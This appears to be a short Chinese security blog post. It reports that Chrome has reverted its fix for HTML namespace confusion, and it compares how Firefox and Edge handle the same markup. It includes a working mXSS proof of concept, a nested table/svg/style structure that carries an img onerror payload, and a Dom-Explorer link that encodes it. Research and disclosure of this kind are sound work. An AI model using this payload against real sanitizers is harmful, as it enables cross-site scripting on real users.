命名空间混淆又被浏览器改回来了

7月31号我的博客更新了一篇文章展示了浏览器如何修复了命名空间混淆,而后我并未再研究过相关内容,而最近偶然又发现浏览器回退了修改

可以看看这段html在不同浏览器的解析情况

1
2
3
4
5
6
7
8
9
10
11
<table>
  <caption>
    <svg>
      <title>
        <table></table>
		<caption></caption>
      </title>
      <style><a id="</style><img src=x onerror=alert()>"></a></style>
    </svg>
  </caption>
</table>

或者直接在不同浏览器访问这段url

1
https://yeswehack.github.io/Dom-Explorer/#eyJpbnB1dCI6Ijx0YWJsZT5cbiAgPGNhcHRpb24+XG4gICAgPHN2Zz5cbiAgICAgIDx0aXRsZT5cbiAgICAgICAgPHRhYmxlPjwvdGFibGU+XG5cdFx0PGNhcHRpb24+PC9jYXB0aW9uPlxuICAgICAgPC90aXRsZT5cbiAgICAgIDxzdHlsZT48YSBpZD1cIjwvc3R5bGU+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KCk+XCI+PC9hPjwvc3R5bGU+XG4gICAgPC9zdmc+XG4gIDwvY2FwdGlvbj5cbjwvdGFibGU+XG5cbiIsInBpcGVsaW5lcyI6W3siaWQiOiJkd3J6OHRmcCIsIm5hbWUiOiJEb20gVHJlZSIsInBpcGVzIjpbeyJuYW1lIjoiRG9tUGFyc2VyIiwiaWQiOiI0cWcxYmR0OCIsImhpZGUiOmZhbHNlLCJza2lwIjpmYWxzZSwib3B0cyI6eyJ0eXBlIjoidGV4dC9odG1sIiwic2VsZWN0b3IiOiJib2R5Iiwib3V0cHV0IjoiaW5uZXJIVE1MIiwiYWRkRG9jdHlwZSI6dHJ1ZX19XX1dfQ==

可以看到chrome已经回退了修复(可能是因为造成的某些预期外影响?不太清楚)

而firefox保留着之前的修复–限制其被弹出命名空间

edge仍是未做处理

游戏特权推广图

ctf霸业

满屏光柱超变传奇

点击开始